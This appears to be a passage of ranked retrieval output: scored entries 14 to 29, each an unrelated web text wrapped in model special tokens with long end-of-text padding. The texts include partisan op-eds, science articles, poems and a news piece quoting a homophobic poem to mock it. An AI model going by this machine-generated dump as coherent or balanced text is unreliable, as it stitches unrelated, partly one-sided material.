strategic probing of our online social networks. Analysis of information about ourselves and our personal relationships allows social +================================================================================ +Rank = 14; Score = 1040384.0 +<|begin_of_text|>The awful truth for Democrats: Trump learns and grows + +Conventional wisdom among the punditry had it that men in their seventies don't change, so President Trump's speechifying would never grow more sophisticated than the rabble-rousing populist they saw on the campaign trail. As usual, political writers, who do not understand what entrepreneurs do, have underestimated Donald Trump. His triumph last night in his first speech to a joint session of Congress has them cornered. People who build large and successful businesses and keep them growing are lifelong learners. Unexpected challenges require quick learning and assessment in order to formulate plans and supervise their execution. Donald Trump clearly learns as he goes. Any fair-minded look at his career reveals that he has mastered many complexities in building an evolving constellation of companies. He has done business in many countries, sells many different kinds of products, and is successful in multiple industries: real estate, television, branding, golf, and on and on. + +As a professor at Harvard Business School and then as a management consultant, I had the opportunity to work with a lot of CEOs, including many entrepreneurs. Nearly all were incredibly smart, picking up information and understanding its implications. They hired me or talked to me because they wanted to learn from my expertise. They were nearly all excellent at concentrated, focused learning. Maybe, sooner or later, the Democrats and their media coterie will realize that President Trump figures out what he needs to accomplish and behaves in ways he thinks will work. He is a strategic guy, which means he is thinking ahead. While his personality is vivid, it is also expressed in multiple modes, not just the angry demagogue seen by the fever-swamp left. He is used to playing various roles and is a gifted performer and communicator to a wide spectrum of the public. And most of all, he learns and he grows, and he gets the advice he can find, and then he learns from it.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 15; Score = 1019904.0 +<|begin_of_text|>Neural networks’ powers of prediction have fueled the recent AI boom, but it can be hard to explain how they reach their decisions. A new technique aimed at uncovering the inner workings of language processing networks is just the latest effort to shed some light on these “black boxes.” + +It’s probably not surprising that we find neural networks so inscrutable, seeing as they are broadly based on the human brain, which we’re also struggling to decipher. The models they learn are not neatly stored as sequences of bits in a database like a conventional computer program, but in the weight of the connections between their thousands of virtual neurons. + +These weights are not set by a human programmer; instead, the neural network essentially programs itself by looking for patterns in reams of data. So while you can test how well a neural network detects cats in a photo, it’s tricky to tell what visual patterns it uses to determine their presence or absence. + +“When it comes to cat detection it’s not a major problem, but this technology is creeping into fields where being able to explain decisions could be important.” + +When it comes to cat detection it’s not a major problem, but this technology is creeping into fields where being able to explain decisions could be important, like financial trading and disease diagnosis. That has led to a growing body of research that’s trying to make the decisions of these algorithms more explainable. + +Earlier this month, MIT engineers unveiled a technique that promises to provide insight into any natural language processing network regardless of the underlying software. That’s because it works by simply varying the input into the algorithm and measuring the impact on the output. + +The group used their own neural network that compresses and decompresses natural sentences to come up with lists of closely-related sentences that can then be fed into the neural network being interrogated. By analyzing how slight variation in the input changed the output, the researchers are able to discover how the network reacts to particular words and phrases. + +One of the tests they conducted was on a translation service provided as part of Microsoft’s Azure cloud services. French has different forms of each noun depending on the gender of the subject. For instance, a male dancer is a “danseur” and female one is a “danseuse.” + +They found the model tended to show a preference for the masculine form in sentences containing occupations such as doctor or professor or adjectives such as smart or talented, while it chose the feminine form for charming, compassionate subjects who are dancers or nurses. + +This kind of gender bias would be hard to detect by simply scouring the +================================================================================ +Rank = 16; Score = 995328.0 +<|begin_of_text|>The design of many robots has been inspired by living creatures, from the humanoid machines that have appeared in science fiction for decades to the mechanical cockroaches that scurry around some research labs. There has even been a robotic tuna used to explore the ocean. But our reliance on the mechanical has left a very large area of the animal kingdom left out: soft bodied creatures with neither skeletons nor shells. In a paper that will be released by PNAS, researchers describe a soft-bodied robot that can crawl around lab, powered by compressed air. + +The limits in robot design have been very practical. We don't yet have something that will mimic muscles well, which leaves our creations articulating their joints with things like gears and engines, which require a fairly rigid support structure. But the creators of this new robot were inspired by squid, which perform impressive feats of flexibility using a soft body that's supported by the ocean's buoyancy. + +They figured they could skip the buoyancy requirement by using a tough elastomer that can stand up to the force of gravity while still retaining enough flexibility to move around. In practical terms, their work required two elastomers, one that was able to stretch when put under an appropriate force, another that would flex, but not stretch. A chamber that had these elastomers on opposite surfaces would flex in a specific way when the chamber was pressurized, with stretching on only one side causing it to curve in the opposite direction. A series of theses chambers linked together could create the sort of "muscle" that would propel their creation. + +To create an actual robot, they fabricated a "tetrapod," with four limbs spreading out from a central body in a tall X shape. Each of the limbs could curve down when pressure was applied, and the "body" at the center of the X could either be held rigid or allowed to flex. + +Before you get images of a giant, rubbery X shambling down the street, we'll point out that the robot here was only about 15cm (six inches) long. On the plus side, that allowed it to move using only about a half-atmosphere of pressure—about 10 percent of what you'd find in a typical bike tire. The pressurized air was supplied externally through a set of flexible tubes, but there doesn't seem to be a reason that a small pump couldn't be carried along, though it might take much longer for it to move. + +The simplicity of the system also allowed it to be programmed with a remarkably low-tech approach: +================================================================================ +Rank = 17; Score = 995328.0 +<|begin_of_text|>Hundreds of young children in Afghanistan are being forced to share a jail cell with their mothers; women who in many cases are protesting their innocence or have been convicted of so-called moral crimes. + +Many of those children are facing years behind bars, cut off from the outside world yet themselves completely innocent of any offence. + +People & Power sent filmmakers Mike Healy and Najibullah Quraishi to find out why. + +FILMMAKER'S VIEW + +By Mike Healy + +The frequently appalling treatment of women in Afghanistan is a subject that has been well covered by the international media, and quite rightly so: Earlier this year for example, my British-Afghan colleague Najibullah Quraishi and I interviewed women who had been badly beaten and abused by their husbands and their families (including other women), and had no other option but to live secretly in a women's shelter in Kabul. + +One young woman had been stabbed in the head by her husband and had had her fingernails pulled out. When she tried to escape, she was imprisoned for four years by the authorities for the "moral crime" of simply being a woman unaccompanied by a male. + +We wanted to know what happened to the young children of such women (even the guilty ones), and Najibullah, using his extensive range of contacts in Afghanistan, secured us access to Jowzjan prison - sometimes referred to as Sheberghan prison, after the town where it's situated. + +A person in this 21st century needs to learn, experience and feel a lot of things in their first years of life so they are equipped to make the right choices and have a positive impact on society. In a prison environment... they miss out on those experiences. Afghan psychologist + +As far as we know, no-one has ever gained filming access to this subject before. The prison authorities took some persuading, and were conscious of how they would come across to an international audience, but the fact that this prison is widely seen as the best in northern Afghanistan meant that, relatively speaking, they had less to hide. + +Here the staff genuinely seemed to have personal connections with the female inmates, and living conditions – though clearly very basic – were relatively bearable. But we also heard reports of prisons in other areas where staff abuse and even rape the women under their guard. + +Once we got there, perhaps the biggest surprise was just how young the majority of the children were. But actually it made sense that the very youngest children including newborns in need of the greatest care remained with their mothers - +================================================================================ +Rank = 18; Score = 962560.0 +<|begin_of_text|>This is a book on algorithms, some of them are probabilistic. But the book is a must have for students, job candidates even full time engineers & data scientists + +Good read. Overall Poker/Blackjack type card games are a good way to get introduced to probability theory + +Easily the most expensive book out there. So if the item above piques your interest and you want to go pro, go for it. + +Well written and easy to read mathematics. For the Poker beginner. + +An excellent resource (students/engineers/entrepreneurs) if you are looking for some code that you can take and implement directly on the job. + +Understanding Probability: Chance Rules in Everyday Life A bit pricy when compared to the first one, but I like the look and feel of the text used. It is simple to read and understand which is vital especially if you are trying to get into the subject + +Data Mining: Practical Machine Learning Tools and Techniques, Third Edition (The Morgan Kaufmann Series in Data Management Systems) This one is a must have if you want to learn machine learning. The book is beautifully written and ideal for the engineer/student who doesn't want to get too much into the details of a machine learned approach but wants a working knowledge of it. There are some great examples and test data in the text book too. + +This is a good book if you are new to statistics & probability while simultaneously getting started with a programming language. The book supports R and is written in a casual humorous way making it an easy read. Great for beginners. Some of the data on the companion website could be missing. + +Q: You have a coin that is biased to either heads or tails with probability \(p\) and you don't which way. How do you generate fair tosses using just this coin?A: There exists a fairly simple and elegant solution to this puzzle. Instead of using just the out come of the toss, use the outcomes of pairs of tosses that result in the patterns HT or TH. All other patterns should be ignored. The first instance of \(\{\ldots HT\ldots\}\) should be treated as a "heads" and if the first instance in series is \(\{\ldots TH\ldots\}\) then it should be treated as "tails". Here is why it works. Assume \(P(Heads) = p\) and \( P(Tails) = 1 - p\). The probability of getting a head followed by a tails is \(p\times(1-p)\). +================================================================================ +Rank = 19; Score = 962560.0 +<|begin_of_text|>I fell + +The flowers wrap around my body + +Teetering on the edge of death + +I’m in a world forgotten by most + +I met the mother of many, + +She taught me and I spoke. + +She fell + +The glow of my mistake shook me. + +Cold bit my nose and finger tips + +I was no longer alone with my thoughts + +And my thoughts’ thoughts. + +Brothers of bone eased my fears. + +Snow fell + +But I found warmth in my new friends + +Spicy, startling, creeping fate, + +In serenity and solitude she found me, + +The warrior destined to save them + +Like a fish out of water, I ran. + +Drops fell + +Off my brow and out of my hand. + +Two pairs of hands reach out for me now, + +They were opposites in almost every way, + +One flesh, meek, and seemed to be helping, + +One metal, flashy, and more interested in performing. + +Parts fell + +But she could put him back together. + +Souls collected, I am the last one, + +Please don’t make me do this! + +My hands shook as the knife carved like magic, + +I was filled with uncertainty + +He fell + +But not a soul went to waste + +The flowers wrapped around their bodies + +A transformation of a child’s dream strung me in place + +My new friends were lost, now found, + +Love and grief filled the holes + +It fell. + +After not seeing the sun the horizon inspired joy. + +But, + +The flowers stacked inside their body + +They fell. + +Unfair, the sacrifice did not save them, + +But I can save them. Now or however many more times, + +I’m not the angel, they’re not the demon, + +We’re kids with horror in common. + +I fell. + +I fell. + +I fell. + +I fell. + +What were those feelings again? + +I fell. + +I fell. + +I + +f + +e + +l + +l + +. + +I fell + +I fell. + +The flowers wrap around my body. + +Teetering on the edge of death, + +I might have felt more dead than alive. + +But I must do it. + +I must allow myself to be saved.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 20; Score = 950272.0 +<|begin_of_text|>'I saw the kiss by Michael Sam.. It made me mad–he kissed a man! + +This is not going to win any poetry prizes, unless it’s for ‘Most Bigoted Entry’. + +Evangelist and apparent amateur poet Peter LaBarbera has released a new work attacking gay athlete Michael Sam. + +It is titled ‘I Saw the Kiss by Michael Sam. It Made Me Mad. He Kissed a Man!’ (Hardly ‘Shall I compare thee to a summer’s day?’ is it?). + +It is in ‘tribute’ to the gay athlete when he learned he would become the first openly LGBTI player to be drafted into the NFL. + +When he learned the news he was in the St. Louis Rams, the kiss he gave his boyfriend Vito Cammisano went viral around the world. + +Having spent months, clearly, working on the poem, LaBarbera has finally released his full rhyming thoughts on the subject on his website. + +Note the couplet in which ‘gayness’ is rhymed with ‘anus’. Beautiful. + +I saw the kiss by Michael Sam.. + +It made me mad–he kissed a man! + +That’s something I don’t want to see + +It’s wrong, unnatural, and it’s not just me. + +Many now say, ‘Homosexuality is OK.’ + +But God says there’s a better way. + +He made men for women, and women for men. + +So why are ‘gays’ so prideful then? + +Please, no public same-sex kisses, Michael Sam. + +We don’t want to see this man-on-man! + +Not in a boat, not in a car + +This public perversion goes too far! + +Not in the store or on a bus + +This same-sex stuff, it brings disgust. + +Not at the movies or on TV + +It’s wrong, unnatural, can’t you see?! + +I don’t want my kids to think it’s right + +So please, please, keep it out of sight! + +Why is it always in our faces? + +This sin–celebrated in so many places? + +Even at football and baseball games + +We have to pretend homosexuality’s the same. + +Young kids exposed to same-sex acts, + +When parents just wanna’ have fun and relax. + +‘Well,’ said Michael Sam, ‘let me ask you this: + +‘Do you get mad when men and women kiss?!’ + +Man and woman, that’s Nature’s way. + +As long as there’s not too much PDA. + +‘But can’t you see, it’s who I am?! + + +================================================================================ +Rank = 21; Score = 942080.0 +<|begin_of_text|>Would you be alright, he asked me, in a dream. Would you be able to hold it together, he said, a question in his eyes. I lifted my shoulders, maybe shrugging, maybe tucking my head and my neck in my sweater for warmth, as I feel the cold start to seep into my bones. It doesn’t matter now, does it, is the only thing I could reply. It hardly ever matters now. + +Everyone Who Left Us + +Steven Cramer + +Everyone who left us we find everywhere. + +It’s easier now to look them in the eyes — + +At gravesites, in bed, when the phone rings. + +Of course, we wonder if they think of us. + +It’s easier, now, to look them in the eyes, + +Imagine touching a hand, listening to them talk. + +Of course, we wonder if they think of us + +When nights, like tonight, turn salty, warm. + +Imagine touching a hand, listening to them talk — + +Hard to believe they’re capable of such coldness. + +When nights, like tonight, turn salty, warm, + +We think of calling them, leaving messages. + +Hard to believe they’re capable of such coldness — + +No color, no pulse, not even a nerve reaction. + +We think of calling them, leaving messages + +Vivid with news we’re sure they’d want to know. + +No color, no pulse, not even a nerve reaction: + +We close our eyes in order not to see them. + +Vivid with news, we’re sure they’d want to know + +We don’t blame them, really. They weren’t cruel. + +We close our eyes in order not to see them + +Reading, making love, or falling asleep. + +We don’t blame them. Really, they weren’t cruel, + +Though it hurts every time we think of them: + +Reading, making love, or falling asleep, + +Enjoying the usual pleasures and boredoms. + +Though it hurts every time we think of them, + +Like a taste we can’t swallow, their names stay. + +Enjoying the usual pleasures and boredoms, + +Then, they leave us the look of their faces + +Like a taste we can’t swallow. Their names stay, + +Diminishing our own, getting in the way + +At gravesites, in bed, when the phone rings. + +Everyone who left us we find everywhere, + +Then they leave us, the look of their faces + +Diminishing, our own getting in the way.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 22; Score = 921600.0 +<|begin_of_text|>Photo: Media & Social Movements (Scott Olson) + +Dedicated to those who resist slavery: chattle, wage and prison + +On this day of slavery-this Fourth of July- + +Fredrick Douglass’ words challenge current lies. + +Today we aren’t slaves but we still aren’t free. + +Oppression still remains daily reality. + +Wage slaves are slaves-we pay for food and shacks. + +Frederick Douglass demanded “Freedom” from a system anti-Black + +And Fredrick Douglass’ words ring truer now. + +3 million locked up, Black and Brown then how… + +How is a country “the land of the free” + +with the most people in prison? Its fallacy!! + +The Civil War ended-slaves freed themselves-many. + +Now are shackled behind bars and paid mere pennies + +And jingoists yell, “If you don’t like it leave! + +Go somewhere else!!” but there is no reprieve. + +This country attacks all those who rebel. + +Obey Uncle Sam or he’ll bomb you to hell. + +The people are rising world round every day. + +Keep doing that here. I won’t go away. + +I will stay and fight your farce of July. + +Your phony jubilation – Rotten apple pies. + +Fight from inside the belly of the beast. + +Disrupt the party. Spoil the feast. + +The Government sings “It’s a home of the brave”!!! + +A home for capitalists-a trap for wage slaves. + +A home for bigots feeling safe in their system. + +A home for the bullies and those who defend them. + +For the oppressed and workers we are never at home. + +Attacked by police, spied on by drones + +Our wages are small, rent is too high. + +There is no independence on the Fourth of July. + +The brave have no home, no country or flag. + +So keep your red, white and blue, that imperialist rag. + +Celebrate the heroes who rebelled before us. + +Like Harriet Tubman and Frederick Douglass. + +Abandon the flag of stripes and stars + +the butchers apron- Confederate bars. + +For the international struggle workers have no borders. + +Take down the bosses, the pigs and the hoarders. + +This Fourth of July read Fredrick’s word. + +Freedom will be coming-act like ya heard. + +But it won’t be under the flag of might. + +Take the Amerikkkan flag and spark the fight.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 23; Score = 864256.0 +<|begin_of_text|>Lumbering around on his barky limbs, sprouting flowers and even dancing in a pot, one of the stars of the film "Guardians of the Galaxy" bizarrely blends the plant and animal kingdoms. "Groot," awalking, talking tree, seems to defy nature but how outlandish is the idea of a plant-animal hybrid? + +Plants that can smell and animals that regenerate show that animal and vegetable kingdoms may not be as far apart as they first appear. Some scientists even say Earth's biology suggests the possibility of "thinking plants" somewhere in the universe. + +Here, experts tell how Groot-like blending could occur, and some reasons it couldn't. [Science Fact or Fiction? The Plausibility of 10 Sci-Fi Concepts] + +Plant sight, plant hearing + +In the film, Groot clearly hears, sees, feels and talks (albeit, only three words, "I am Groot"). While one would be hard-pressed to find a talking vegetable on Earth, the idea of communicating and sensing plants is not at all outlandish, Danny Chamovitz, director of the Manna Center for Plant Biosciences at Tel Aviv University and author of "What a Plant Knows" (Scientific American, 2012), told Live Science. + +In fact, plants have a much richer, more dynamic life than most people give the leafy beings credit for, Chamovitz said. "We think of plants as un-living, because they're unmoving," Chamovitz said. "The strong scientific evidence is that plants have every sense familiar in animals, except hearing." + +They respond to chemicals, with lock-and-key mechanisms that resemble how animals smell. Plants have specific photoreceptors, which are proteins that respond to different wavelengths of light. They "know" when they're being touched, Simon Gilroy, a professor of botany at the University of Wisconsin-Madison, told Live Science. + +Plants also have proprioception, or a sense of their location in space, Chamovitz said, which is why they can tell when they're planted upside-down. + +Some plants can even "hear," able to distinguish the vibration patterns made by different chewing caterpillars, according to a study detailed this summer in the journal Oecologia, Gilroy said. (Decades-old claims that plants can "hear music," however, have little to no scientific support, he added.) + +This plant sensing may not seem evident after all, plants don't scream in pain or comment on Van +================================================================================ +Rank = 24; Score = 843776.0 +<|begin_of_text|>Machine Learning: An In-Depth Guide — Unsupervised Learning, Related Fields, and Machine Learning in Practice + +Alex Castrounis Blocked Unblock Follow Following Mar 18, 2016 + +Articles in This Series + +Introduction + +Welcome to the fifth and final chapter in a five-part series about machine learning. + +In this final chapter, we will revisit unsupervised learning in greater depth, briefly discuss other fields related to machine learning, and finish the series with some examples of real-world machine learning applications. + +Unsupervised Learning + +Recall that unsupervised learning involves learning from data, but without the goal of prediction. This is because the data is either not given with a target response variable (label), or one chooses not to designate a response. It can also be used as a pre-processing step for supervised learning. + +In the unsupervised case, the goal is to discover patterns, deep insights, understand variation, find unknown subgroups (amongst the variables or observations), and so on in the data. Unsupervised learning can be quite subjective compared to supervised learning. + +The two most commonly used techniques in unsupervised learning are principal component analysis (PCA) and clustering. PCA is one approach to learning what is called a latent variable model, and is a particular version of a blind signal separation technique. Other notable latent variable modeling approaches include expectation-maximization algorithm (EM) and Method of moments3. + +PCA + +PCA produces a low-dimensional representation of a dataset by finding a sequence of linear combinations of the variables that have maximal variance, and are mutually uncorrelated. Another way to describe PCA is that it is a transformation of possibly correlated variables into a set of linearly uncorrelated variables known as principal components. + +Each of the components are mathematically determined and ordered by the amount of variability or variance that each is able to explain from the data. Given that, the first principal component accounts for the largest amount of variance, the second principal component the next largest, and so on. + +Each component is also orthogonal to all others, which is just a fancy way of saying that they’re perpendicular to each other. Think of the X and Y axis’ in a two dimensional plot. Both axis are perpendicular to each other, and are therefore orthogonal. While not easy to visualize, think of having many principal components as being many axis that are perpendicular to each other. + +While much of the above description of principal component analysis may be a bit technical sounding, it is actually a relatively simple concept from a high level. Think of having a +================================================================================ +Rank = 25; Score = 843776.0 +<|begin_of_text|>“I am not bound to win, but I am bound to be true. I am not bound to succeed, but I am bound to live up to what light I have. ” ~Abraham Lincoln + +As a child, my father always told me, “At everything you do, you have to be number one.” I tried. In some ways, I succeeded. I got high grades. Sometimes, the highest. Sometimes, I got awards. + +I became an expert at figuring out other people’s expectations and meeting them. This got me approval, but it never made me happy. I wasn’t passionate about grades, awards, or approval. I didn’t feel butterflies in my stomach while doing math. I didn’t feel shivers down my spine while conjugating French verbs. + +I loved to write, sing, dance. I was the girl who made up song lyrics and got them stuck in her head. I was the girl who stayed up after her parents went to bed to dance around, sing into my pillow, and crawl out onto the roof to dream about flying far, far away. I was that girl who couldn’t understand my thoughts until I wrote them down. + +Despite my parents’ wishes for me to pursue an academic, intellectual route, I went to theatre school. There, I thought I would explore the deepest crevices of my desires. I was wrong. + +I found the fine art education world to be shallow, and I found myself to be the same. My mind fixated on being the best. I never was. Disappointed with myself as much as the program, I dropped out. I slunk back to logic and facts. Skepticism. Analysis. Things I was good at. I got good grades. I got awards. + +But being good at something is never a replacement for loving it. I was addicted to academic achievement because it earned me approval. I could never get enough. Again, I got hungry for art. + +After I almost led myself into an early grave, I realized how important it was to make time for the things that made me feel alive. Yet on that journey, I’ve found myself constantly in the intermediate pile. Sometimes, beginner. Never, ever the best. + +I run all the time, but I’m not fast. I’ve been doing yoga for ten years, but I still can’t do Crow Pose. I’ve been playing acoustic guitar on and off for years, and I still struggle with barre chords. I’ve been singing since I was a kid, and my performances are inconsistent +================================================================================ +Rank = 26; Score = 819200.0 +<|begin_of_text|>This is always hard, being honest about a movie I’ve been looking forward to for so long and then being let down. Prometheus is another case where the hype out measures the film. When a film leaves a lot to be desired it can be frustrating, especially in the unique case of Prometheus. Before you continue reading, see Prometheus. It’s great, but be warned it is very flawed and the hype oversells it. As I say with almost every Ridley Scott film, I have a feeling there may be a directors cut on the way. + +Billed as a “quasi prequel” to Ridley Scott’s Alien, Prometheus starts as the journey to a large moon to explore a star system that has appeared in markings of ancient civilizations spanning thousands of years and vast distances. Egyptians, mayans, and even early settlers at the Isle of Skye have marked the same system of stars in their cave markings and carvings. A team, funded by the Weyland corporation and led by the excavators who discovered the markings, is sent out to find what some believe would be the origin of life on Earth and “meet our makers.” One of the crew, David, is an android and knows his makers well. If an android can register emotions than David has certainly learned to harbour resentment and disappointment. He is largely taken for granted as a machine, something meant to serve the conveniences of humans, his own makers. When the crew arrives on the moon and begins exploring, the things they find are horrific but not exactly explained in any way. + +That’s the major problem with Prometheus. There is a lot going on, and there is a lot of information for us to interpret, but a lot of questions are raised and a lot of character’s motivations are uncertain. The script is very confused to start with. With the story that Scott, Damon Lidelof and John Spaihts have chosen to tell, there were many scenes that were left lacking. Lindelof, still working in Lost mode, is more content to raise questions than deliver answers. This is good for a television show where there is more time to develop a world and make it mysterious, but in a film the payoff has to match the mysteries. Lindelof is relying on the Alien franchise to help answer some of those questions, but it doesn’t, because many of the things that Prometheus clears up, i.e. the motivation for the Weyland Corporation’s continued insistence of capturing the Xenomorph, aren’t as satisfying as he thinks they are because of +================================================================================ +Rank = 27; Score = 819200.0 +<|begin_of_text|>This week a number of stories claiming the Tories had voted that animals are not sentient beings went mega-viral. An article on the Independent website – shared thousands of times on social media – reported “The Tories have rejected all scientists and voted that animals don’t feel pain”. The Evening Standard claimed they “just voted that animals cannot feel pain or emotions”. The Indy, which has truly become one of the most downmarket trash clickbait websites around, even named and shamed the Tory MPs “who voted legislation on animals feeling pain and emotion”. These attacks were tweeted out by celebrities like Ben Fogle and Sue Perkins, politicians including Caroline Lucas and failed LibDem MP Sarah Olney, and petitions were signed by hundreds of thousands of unwitting animal lovers. The stats are huge: + +Analysis shows 2 million people have seen articles and tweets about the Tories voting against animal sentience + +155,157 signed a Change.org petition repeating the claim + +263,476 signed another petition on 38 Degrees + +43,081 signed a third petition on ThePetitionSite + +Nearly 30,000 have signed smaller petitions (that’s almost 500,000 overall) + +Sue Perkins shared it with her 1 million followers + +Rachel Riley shared it with her 510,000 followers + +Ben Fogle shared it with his 336,000 followers + +Caroline Lucas shared it with her 276,000 followers + +The RSPCA tweeted it out to their 248,000 followers + +Just one problem. It is fake news… + +During last Wednesday’s debate, Tory MPs repeatedly explained that the government already recognised animal sentience and that the amendment was flawed. Read it here in Hansard – Tory MP after Tory MP stood up and agreed that animals are sentient. No MPs argued against animal sentience. It is just not true to say, as the Indy did, that “The Tories have rejected all scientists and voted that animals don’t feel pain”. Anyone who has seen the Environment Secretary with his Bichon Frise Snowy, or indeed the hedgehog above, knows these viral articles are fake news. This made up story, circulated by the Tories’ opponents for solely cynical reasons, is cutting through to animal lovers who think they can trust things they believe on the Independent website. This morning Michael Gove categorically committed the government to animal sentience once and for all. He couldn’t be clearer: + +“This government will ensure that any necessary changes required to UK law are made in a rigorous and comprehensive way to ensure animal sentience is recognised after we leave the +================================================================================ +Rank = 28; Score = 819200.0 +<|begin_of_text|>In January 1999, the president of Tiger Electronics, Roger Shiffman, was forced to issue a statement clearing the name of the company’s hottest new toy. “Furby is not a spy,” he announced to the waiting world. + +Shiffman was speaking out after America’s National Security Agency (NSA) banned the toy from its premises. The ban was its response to a playground rumour that Furbies could be taught to speak, and therefore could record and repeat human speech. “The NSA did not do their homework,” said Shiffman at the time. + +But if America’s security agencies are still in the habit of banning toys that can record, spy, and store private information, then the list of contraband items must be getting exceptionally long. Nearly 18 years after TE were forced to deny Furby’s secret agent credentials, EU and US consumer watchdogs are filing complaints about a number of WiFi and Bluetooth connected interactive toys, also known as smart toys, which have hit the shelves. Equipped with microphones and an internet connection, many have the power to invade both children’s and adults’ private lives. + +*** + +“We wanted a smart toy that could learn and grow with a child,” says JP Benini, the co-founder of the CogniToys “Dino”, an interactive WiFi-enabled plastic dinosaur that can hold conversations with children and answer their questions. Benini and his team won the 2014 Watson Mobile Developer Challenge, allowing them to use the question-answering software IBM Watson to develop the Dino. As such, unlike the “interactive” toys of the Nineties and Noughties, Dino doesn’t simply reiterate a host of pre-recorded stock phrases, but has real, organic conversations. “We grew it from something that was like a Siri for kids to something that was more conversational in nature.” + +In order for this to work, Dino has a speaker in one nostril and a microphone in the other, and once a child presses the button on his belly, everything they say is processed by the internet-connected toy. The audio files are turned into statistical data and transcripts, which are then anonymised and encrypted. Most of this data is, in Benini’s words, “tossed out”, but his company, Elemental Path, which owns CogniToys, do store statistical data about a child, which they call “Play Data”. “We keep pieces from the interaction, not the full interaction itself,” he tells me. + +“ +================================================================================ +Rank = 29; Score = 811008.0 +<|begin_of_text|>Show More + +It is easy to see how this arrogance comes. The genius is a genius by the first look he casts on any object. Is his eye creative? Does he not rest in angles and colors, but beholds the design?- he will presently undervalue the actual object. In powerful moments, his thought has dissolved the works of art and nature into their causes, so that the works appear heavy and faulty. He has a conception of beauty which the sculptor cannot embody. Picture, statue, temple, railroad, steam-engine, existed first in an artist's mind, without flaw, mistake, or friction, which impair the executed models. So did the Church, the State, college, court, social circle, and all the institutions. It is not strange that these men, remembering what they have seen and hoped of ideas, should affirm disdainfully the superiority of ideas. Having at some time seen that the happy soul will carry all the arts in power, they say, Why cumber ourselves with superfluous realizations? and like dreaming beggars they assume to speak and act as if these values were already substantiated. + +On the other part, the men of toil and trade and luxury,- the animal world, including the animal in the philosopher and poet also, and the practical world, including the painful drudgeries which are never excused to philosopher or poet any more than to the rest,- weigh heavily on the other side. The trade in our streets believes in no metaphysical causes, thinks nothing of the force which necessitated traders and a trading planet to exist: no, but sticks to cotton, sugar, wool and salt. The ward meetings, on election days, are not softened by any misgiving of the value of these ballotings. Hot life is streaming in a single direction. To the men of this world, to the animal strength and spirits, to the men of practical power, whilst immersed in it, the man of ideas appears out of his reason. They alone have reason. + +Things always bring their own philosophy with them, that is, prudence. No man acquires property without acquiring with it a little arithmetic also. In England, the richest country that ever existed, property stands for more, compared with personal ability, than in any other. After dinner, a man believes less, denies more: verities have lost some charm. After dinner, arithmetic is the only science: ideas are disturbing, incendiary, follies of young men, repudiated by the solid portion of society +================================================================================ +Rank = 30; 